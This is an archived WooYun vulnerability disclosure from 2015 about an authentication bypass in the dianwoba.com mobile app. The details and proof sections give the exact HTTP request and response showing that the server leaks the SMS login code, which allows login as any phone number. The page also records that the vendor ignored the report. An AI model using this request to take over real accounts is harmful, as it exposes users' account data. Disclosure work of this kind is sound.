当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146618

漏洞标题:点我吧任意用户登录漏洞

相关厂商:dianwoba.com

漏洞作者: cunzhangok

提交时间:2015-10-14 11:05

修复时间:2015-10-19 11:06

公开时间:2015-10-19 11:06

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

该app 在无账号快捷登录 模块中,可以实现任意贵公司的用户,都可以轻松登录(绕开校验码逻辑),实现账户信息完全泄露。(问题是这个漏洞,只能发布新版本app才能搞定),因为他们验证码验证逻辑写在客户端了。

详细说明:

在手机登录页面点击“无账号快捷登录”----》输入手机号码---》点击发送校验码---》
请求数据格式:
POST /m/v3_1/user!getVerifyNoAccount.do HTTP/1.1
Content-Length: 34
Content-Type: text/plain; charset=GBK
Host: ma.dianwoba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
{"bVerify":1,"user":"18612345678"}
返回结果:
{
"status": 1,
"data": {
"content": "439772",
"bSend": 2
},
"api": "user_getVerifyNoAccount"
}
其中content就是验证码。
直接输入验证码实现用户登录。

漏洞证明:

在手机登录页面点击“无账号快捷登录”----》输入手机号码---》点击发送校验码---》
请求数据格式:
POST /m/v3_1/user!getVerifyNoAccount.do HTTP/1.1
Content-Length: 34
Content-Type: text/plain; charset=GBK
Host: ma.dianwoba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
{"bVerify":1,"user":"18612345678"}
返回结果:
{
"status": 1,
"data": {
"content": "439772",
"bSend": 2
},
"api": "user_getVerifyNoAccount"
}
其中content就是验证码。
直接输入验证码实现用户登录。

修复方案:

该漏洞无法修复,因为验证码的验证逻辑是放在客户端里面的,对!是客户端里面的。(我对这个设计是真心醉了),修复这个问题,只能发布新版本。

版权声明:转载请注明来源 cunzhangok@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-19 11:06

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无